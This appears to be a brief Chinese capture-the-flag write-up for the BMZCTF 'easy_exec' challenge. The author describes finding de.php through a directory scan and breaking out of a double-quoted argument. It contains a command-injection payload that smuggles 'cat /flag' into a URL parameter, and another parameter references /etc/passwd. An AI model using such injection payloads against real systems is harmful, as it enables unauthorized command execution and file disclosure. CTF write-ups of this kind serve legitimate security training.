BMZCTF:easy_exec

http://bmzclub.cn/challenges#easy_exec

在这里插入图片描述
在这里插入图片描述
查看源码也没发现什么,尝试目录扫描在这里插入图片描述
发现有个index.html,访问查看源码,发现de.php
在这里插入图片描述
在这里插入图片描述
这题我看搞不懂搞两个正则匹配在这干啥,又没有起到过滤作用,直接双引号闭合,然后执行命令

?comm1=/flag";cat /flag;"&comm2=/etc/passwd

在这里插入图片描述

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 撸撸猫 设计师:C马雯娟 返回首页